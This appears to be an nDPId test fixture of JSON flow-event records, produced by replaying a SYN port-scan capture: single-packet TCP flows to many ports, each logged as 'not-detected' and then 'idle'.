-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 